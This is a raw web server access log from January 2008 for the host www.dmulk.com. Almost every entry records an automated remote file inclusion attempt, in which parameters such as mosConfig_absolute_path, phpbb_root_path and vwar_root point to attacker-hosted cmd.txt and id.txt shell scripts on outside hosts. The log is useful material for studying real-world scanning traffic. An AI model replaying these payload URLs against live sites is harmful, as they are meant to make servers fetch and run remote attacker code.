208.186.169.183 - - [26/Jan/2008:04:34:25 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:04:34:25 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:04:34:48 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.19.72 - - [26/Jan/2008:04:35:08 -0800] "GET /minamijewelry/?M=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:04:35:12 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:04:35:12 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:04:35:13 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:04:36:08 -0800] "GET /logs/access_071214.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.132.12 - - [26/Jan/2008:04:36:29 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kaozzoak.dk/images/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.132.12 - - [26/Jan/2008:04:36:30 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kaozzoak.dk/images/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.132.12 - - [26/Jan/2008:04:36:30 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kaozzoak.dk/images/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.0.169.109 - - [26/Jan/2008:04:36:34 -0800] "GET /errors.php?error=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
68.0.169.109 - - [26/Jan/2008:04:36:34 -0800] "GET /logs/errors.php?error=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
66.79.163.220 - - [26/Jan/2008:04:38:27 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.3itsgroup.it/language/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [26/Jan/2008:04:38:27 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.3itsgroup.it/language/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [26/Jan/2008:04:38:27 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.3itsgroup.it/language/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.193.83 - - [26/Jan/2008:04:42:34 -0800] "GET /logs/access.log//newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.iwma.de/.r/animal? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.193.83 - - [26/Jan/2008:04:42:34 -0800] "GET //newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.iwma.de/.r/animal? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.193.83 - - [26/Jan/2008:04:42:35 -0800] "GET /logs//newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.iwma.de/.r/animal? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.55.216.70 - - [26/Jan/2008:04:42:39 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://semprenovidades.pagebr.com/overnkn/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.55.216.70 - - [26/Jan/2008:04:42:40 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://semprenovidades.pagebr.com/overnkn/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.55.216.70 - - [26/Jan/2008:04:42:41 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://semprenovidades.pagebr.com/overnkn/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.79.163.220 - - [26/Jan/2008:04:42:45 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.3itsgroup.it/language/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.204.230.31 - - [26/Jan/2008:04:43:07 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.193.83 - - [26/Jan/2008:04:43:33 -0800] "GET /logs/access_080106.log//newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.iwma.de/.r/animal? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.22.74.129 - - [26/Jan/2008:04:44:53 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=www.geocities.com/paddy.only/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.205.57.211 - - [26/Jan/2008:04:46:12 -0800] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.202.197.185 - - [26/Jan/2008:04:48:12 -0800] "GET /index3.php?p=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
80.202.197.185 - - [26/Jan/2008:04:48:13 -0800] "GET /logs/index3.php?p=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
200.55.216.70 - - [26/Jan/2008:04:48:57 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://semprenovidades.pagebr.com/overnkn/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.0.169.109 - - [26/Jan/2008:04:49:33 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
212.12.125.117 - - [26/Jan/2008:04:50:53 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
212.12.125.117 - - [26/Jan/2008:04:50:53 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://190.8.128.58/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
193.19.225.162 - - [26/Jan/2008:04:51:00 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.19.225.162 - - [26/Jan/2008:04:51:00 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.228.66.170 - - [26/Jan/2008:04:51:07 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://www.aneuk.com/test/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.228.66.170 - - [26/Jan/2008:04:51:07 -0800] "GET //?mosConfig_absolute_path=http://www.aneuk.com/test/oke.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
200.228.66.170 - - [26/Jan/2008:04:51:08 -0800] "GET /logs//?mosConfig_absolute_path=http://www.aneuk.com/test/oke.txt? HTTP/1.1" 200 32488 "-" "libwww-perl/5.79" "www.dmulk.com"
200.55.216.70 - - [26/Jan/2008:04:51:43 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://semprenovidades.pagebr.com/overnkn/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.237.161.242 - - [26/Jan/2008:04:52:02 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/bujankgilo/SAntcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.37.66.135 - - [26/Jan/2008:04:52:13 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.37.66.135 - - [26/Jan/2008:04:52:13 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.26.137.64 - - [26/Jan/2008:04:52:13 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.37.66.135 - - [26/Jan/2008:04:52:13 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.19.225.162 - - [26/Jan/2008:04:52:14 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.19.225.162 - - [26/Jan/2008:04:52:15 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.88.14.236 - - [26/Jan/2008:04:52:42 -0800] "GET /errors.php?error=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
85.88.14.236 - - [26/Jan/2008:04:52:44 -0800] "GET /logs/errors.php?error=http://www.abilon.nl/upload/robot.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:04:53:05 -0800] "GET /index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.205.57.211 - - [26/Jan/2008:04:55:53 -0800] "GET /logs/access_071230.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.57.211 - - [26/Jan/2008:04:55:53 -0800] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.55.216.70 - - [26/Jan/2008:04:56:01 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://semprenovidades.pagebr.com/overnkn/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.55.216.70 - - [26/Jan/2008:04:56:02 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://semprenovidades.pagebr.com/overnkn/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.55.216.70 - - [26/Jan/2008:04:56:03 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://semprenovidades.pagebr.com/overnkn/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.163.232 - - [26/Jan/2008:04:56:25 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [26/Jan/2008:04:56:25 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [26/Jan/2008:04:56:25 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.134.247.120 - - [26/Jan/2008:04:56:47 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.247.120 - - [26/Jan/2008:04:56:47 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.247.120 - - [26/Jan/2008:04:56:47 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.136.66.5 - - [26/Jan/2008:04:56:51 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.136.66.5 - - [26/Jan/2008:04:56:51 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.136.66.5 - - [26/Jan/2008:04:56:51 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.65.41.22 - - [26/Jan/2008:04:56:53 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.41.22 - - [26/Jan/2008:04:56:53 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.41.22 - - [26/Jan/2008:04:56:53 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.247.120 - - [26/Jan/2008:04:58:13 -0800] "GET /logs/access_080106.log//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.41.22 - - [26/Jan/2008:04:58:23 -0800] "GET /logs/access_080106.log//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.136.66.5 - - [26/Jan/2008:04:58:25 -0800] "GET /logs/access_080106.log//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:04:58:37 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:04:58:37 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:04:58:37 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:04:58:58 -0800] "GET /logs/access_071230.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:04:58:58 -0800] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [26/Jan/2008:04:58:58 -0800] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.205.57.211 - - [26/Jan/2008:04:59:44 -0800] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.194 - - [26/Jan/2008:05:00:16 -0800] "GET /logs/access_080106.log//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.205.57.211 - - [26/Jan/2008:05:00:25 -0800] "GET //bemarket/postscript/postscript.php?p_mode=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.22.74.129 - - [26/Jan/2008:05:00:54 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=www.geocities.com/paddy.only/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.22.74.129 - - [26/Jan/2008:05:00:54 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=www.geocities.com/paddy.only/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:05:01:09 -0800] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hitsheet.com/m_pictures/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:05:01:09 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hitsheet.com/m_pictures/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.49.228 - - [26/Jan/2008:05:01:09 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.hitsheet.com/m_pictures/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.206.72.201 - - [26/Jan/2008:05:01:15 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [26/Jan/2008:05:01:16 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [26/Jan/2008:05:01:16 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.37.66.135 - - [26/Jan/2008:05:01:45 -0800] "GET /logs/access_080108.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://oharano.net/modules/mod_stat/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.237.161.242 - - [26/Jan/2008:05:02:16 -0800] "GET /logs/access_071229.log/modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/bujankgilo/SAntcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.161.242 - - [26/Jan/2008:05:02:17 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/bujankgilo/SAntcmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.206.72.201 - - [26/Jan/2008:05:02:37 -0800] "GET /logs/access_080101.log//tools/send_reminders.php?noSet=0&includedir=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.55.196.91 - - [26/Jan/2008:05:02:45 -0800] "GET /logs/access_071225.log//content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.abich.com/.r/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.55.196.91 - - [26/Jan/2008:05:02:46 -0800] "GET //content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.abich.com/.r/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.55.196.91 - - [26/Jan/2008:05:02:46 -0800] "GET /logs//content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.abich.com/.r/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.194.134.166 - - [26/Jan/2008:05:02:55 -0800] "GET /logs/access_071231.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.3itsgroup.it/language/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.194.134.166 - - [26/Jan/2008:05:02:56 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.3itsgroup.it/language/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.194.134.166 - - [26/Jan/2008:05:02:56 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.3itsgroup.it/language/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.204.230.31 - - [26/Jan/2008:05:03:30 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.204.230.31 - - [26/Jan/2008:05:03:30 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://adrianuzzo1985.altervista.org/cartella/cmdx9.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.200.201.194 - - [26/Jan/2008:05:03:36 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://polepositionlingerie.com/images/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [26/Jan/2008:05:03:36 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://polepositionlingerie.com/images/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [26/Jan/2008:05:03:37 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://polepositionlingerie.com/images/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:05:05:42 -0800] "GET /logs/access_071230.log/index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.78.41 - - [26/Jan/2008:05:05:42 -0800] "GET /logs/index.php?option=com_wmtgallery&Itemid=&mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.55.216.70 - - [26/Jan/2008:05:05:43 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://semprenovidades.pagebr.com/overnkn/safe.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.26.29 - - [26/Jan/2008:05:06:54 -0800] "GET /logs/access_071113.log HTTP/1.0" 200 4345 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.234.169.120 - - [26/Jan/2008:05:07:08 -0800] "GET /logs/access_071230.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.234.169.120 - - [26/Jan/2008:05:07:08 -0800] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.234.169.120 - - [26/Jan/2008:05:07:09 -0800] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.22.74.129 - - [26/Jan/2008:05:07:51 -0800] "GET /logs/access_080108.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=www.geocities.com/paddy.only/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:05:08:07 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [26/Jan/2008:05:08:07 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
